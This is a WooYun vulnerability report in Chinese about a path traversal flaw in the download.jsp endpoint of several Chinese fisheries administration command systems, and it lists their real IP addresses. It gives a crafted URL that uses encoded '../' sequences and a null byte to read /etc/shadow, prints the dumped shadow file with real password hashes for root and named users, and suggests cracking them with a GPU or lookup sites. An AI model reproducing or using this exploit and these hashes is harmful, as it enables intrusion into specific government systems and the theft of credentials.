WooYun.org

中国渔政几个指挥系统通用的一个洞。
http://202.127.42.208:8083/EOMS_J2EE/
http://202.127.42.208/EOMS_J2EE/
http://202.127.42.208:8080/CFR/
......
以其中一个为例：
原URL：
http://202.127.42.208/EOMS_J2EE/infopub/manager/TawInformation/download.jsp?name=2012121111284296.doc&fileatt=2013年系统对外提供服务时间安排_2012121111284296.doc
构造的URL：
http://202.127.42.208/EOMS_J2EE/infopub/manager/TawInformation/download.jsp?name=/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E
%2E//etc/shadow%00.zip&fileatt=2013年系统对外提供服务时间安排.txt
下载回来的etc/password
root:$1$apqXBjsl$Iey1AIPiiKbyvybIeOkUs0:15392:0:99999:7:::
bin:*:15392:0:99999:7:::
daemon:*:15392:0:99999:7:::
adm:*:15392:0:99999:7:::
lp:*:15392:0:99999:7:::
sync:*:15392:0:99999:7:::
shutdown:*:15392:0:99999:7:::
halt:*:15392:0:99999:7:::
mail:*:15392:0:99999:7:::
news:*:15392:0:99999:7:::
uucp:*:15392:0:99999:7:::
operator:*:15392:0:99999:7:::
games:*:15392:0:99999:7:::
gopher:*:15392:0:99999:7:::
ftp:*:15392:0:99999:7:::
nobody:*:15392:0:99999:7:::
nscd:!!:15392:0:99999:7:::
vcsa:!!:15392:0:99999:7:::
pcap:!!:15392:0:99999:7:::
ntp:!!:15392:0:99999:7:::
rpc:!!:15392:0:99999:7:::
mailnull:!!:15392:0:99999:7:::
smmsp:!!:15392:0:99999:7:::
sshd:!!:15392:0:99999:7:::
rpcuser:!!:15392:0:99999:7:::
nfsnobody:!!:15392:0:99999:7:::
dbus:!!:15392:0:99999:7:::
haldaemon:!!:15392:0:99999:7:::
avahi:!!:15392:0:99999:7:::
avahi-autoipd:!!:15392:0:99999:7:::
apache:!!:15392:0:99999:7:::
xfs:!!:15392:0:99999:7:::
gdm:!!:15392:0:99999:7:::
sabayon:!!:15392:0:99999:7:::
ais:!!:15392:0:99999:7:::
pegasus:!!:15392:0:99999:7:::
piranha:!!:15392:0:99999:7:::
luci:!!:15392:0:99999:7:::
ricci:!!:15392:0:99999:7:::
yiyang:$1$3W3OTUH7$L1a3EtQulgizDnCuKv.wy1:15392:0:99999:7:::
nybzg:$1$MPOyv4LO$ixlYtrswhsekFFNjwZXJD.:15392:0:99999:7:::
关于解密：
密码是用GPU跑也好，CMD5查也好（有几个CMD5可以查到的）。
跑了密码干啥，大家都知道！我就不搞了。只为了点分数。